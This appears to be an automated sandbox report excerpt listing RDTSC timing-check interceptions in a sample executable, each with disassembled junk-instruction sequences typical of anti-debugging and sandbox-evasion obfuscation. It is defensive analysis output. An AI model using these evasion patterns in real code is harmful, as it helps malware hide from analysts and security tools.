                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07DB0 second address: B07DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B07DB6 second address: B07DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B080C7 second address: B080D5 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B080D5 second address: B080D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08279 second address: B0827D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0827D second address: B0829B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B312295EDh 0x0000000b popad 0x0000000c jne 00007F6B3122961Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0829B second address: B082A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085E6 second address: B085EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085EA second address: B085F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085F0 second address: B085FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B085FA second address: B08604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6B30D7C396h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B08604 second address: B08608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB494 second address: AAB4C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+1244DEB9h], edi 0x00000011 mov dword ptr [ebp+122D1E38h], esi 0x00000017 push 00000004h 0x00000019 pushad 0x0000001a mov dword ptr [ebp+122D1E31h], edi 0x00000020 sbb ecx, 3C248357h 0x00000026 popad 0x00000027 mov dword ptr [ebp+122D2816h], esi 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB4C7 second address: AAB4CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB4CD second address: AAB4D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B092FB second address: B092FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B092FF second address: B09305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0F7A5 second address: B0F7AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FCD7 second address: B0FCDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FCDB second address: B0FCDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FCDF second address: B0FCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FCE9 second address: B0FCFB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B312295E8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B0FCFB second address: B0FD07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10DBE second address: B10DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10DC4 second address: B10DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B30D7C39Dh 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10DD9 second address: B10DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295F6h 0x00000009 pop ecx 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B10DFA second address: B10DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1137D second address: B113B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B312295F9h 0x00000009 jmp 00007F6B312295F5h 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B113B0 second address: B113C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6B30D7C39Eh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B113C4 second address: B113C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B113C8 second address: B113D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F6B30D7C3B5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16201 second address: B16205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1682E second address: B1683B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B1683B second address: B16845 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6B312295E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B16845 second address: B1684E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21FD7 second address: B21FE7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6B312295E6h 0x00000008 jne 00007F6B312295E6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B226C0 second address: B226DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F6B30D7C3A2h 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2356B second address: B2356F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2356F second address: B23582 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F6B30D7C396h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21B5D second address: B21B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B312295F4h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21B76 second address: B21B97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jc 00007F6B30D7C396h 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007F6B30D7C3A2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21B97 second address: B21BAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6B312295E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B21BAB second address: B21BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F6B30D7C396h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EBA second address: B29EBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EBE second address: B29EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EC4 second address: B29ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29ECA second address: B29EE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6B30D7C3A8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EE9 second address: B29EFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jnl 00007F6B312295E6h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29EFA second address: B29F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F6B30D7C39Dh 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2A0CE second address: B2A101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6B312295F2h 0x00000010 jl 00007F6B312295E8h 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39F88 second address: B39F8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39F8E second address: B39F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B39F99 second address: B39F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A0D1 second address: B3A0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F6B312295EDh 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F6B312295EBh 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A0FE second address: B3A102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A102 second address: B3A106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3A106 second address: B3A135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6B30D7C3B9h 0x0000000c jmp 00007F6B30D7C3A5h 0x00000011 jmp 00007F6B30D7C39Eh 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3CF9C second address: B3CFF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F6B312295EBh 0x0000000a push ecx 0x0000000b jmp 00007F6B312295F1h 0x00000010 jmp 00007F6B312295F8h 0x00000015 pop ecx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6B312295F4h 0x0000001e jmp 00007F6B312295EBh 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43284 second address: B4329D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b jl 00007F6B30D7C396h 0x00000011 jc 00007F6B30D7C396h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E89F second address: B4E8A5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E8A5 second address: B4E8AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E6FA second address: B4E706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4E706 second address: B4E70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54593 second address: B545BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007F6B312295E6h 0x0000000c jmp 00007F6B312295EEh 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F6B312295EFh 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B545BF second address: B545E5 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edi 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 push esi 0x00000011 jng 00007F6B30D7C396h 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007F6B30D7C396h 0x00000020 jo 00007F6B30D7C396h 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B545E5 second address: B545F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295EBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54887 second address: B5488B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54B4B second address: B54B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54CB7 second address: B54CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54CBB second address: B54CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54CC9 second address: B54CE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6B30D7C3A2h 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54E5E second address: B54E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F6B312295F2h 0x0000000a jp 00007F6B312295EEh 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B54E85 second address: B54EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e jmp 00007F6B30D7C3A9h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5834E second address: B58354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E390 second address: B5E396 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E396 second address: B5E3BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295EDh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6B312295F8h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E3BF second address: B5E3C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94D46 second address: B94D6B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F6B31229608h 0x0000000e jmp 00007F6B312295F4h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94D6B second address: B94D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B94F03 second address: B94F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9507F second address: B950AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Fh 0x00000007 jg 00007F6B30D7C396h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F6B30D7C3A5h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B950AD second address: B950B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B950B2 second address: B950CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F6B30D7C396h 0x0000000d jmp 00007F6B30D7C39Bh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B957CD second address: B95817 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B312295F4h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F6B312295EEh 0x00000013 popad 0x00000014 jbe 00007F6B312295EAh 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F6B312295F2h 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B95ACB second address: B95AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6B30D7C39Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F6B30D7C3A4h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B975BF second address: B975C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B975C3 second address: B975F4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F6B30D7C398h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007F6B30D7C3ACh 0x0000001b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B975F4 second address: B975FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B975FA second address: B975FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B975FE second address: B9761D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F6B312295E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F6B312295EEh 0x00000012 push esi 0x00000013 pop esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A130 second address: B9A135 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A235 second address: B9A239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A239 second address: B9A25D instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6B30D7C396h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ecx 0x00000011 pop edx 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 ja 00007F6B30D7C39Ch 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A25D second address: B9A267 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6B312295ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A267 second address: B9A275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B9A275 second address: B9A298 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F6B312295E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 pushad 0x00000011 pushad 0x00000012 jmp 00007F6B312295EBh 0x00000017 push edi 0x00000018 pop edi 0x00000019 popad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
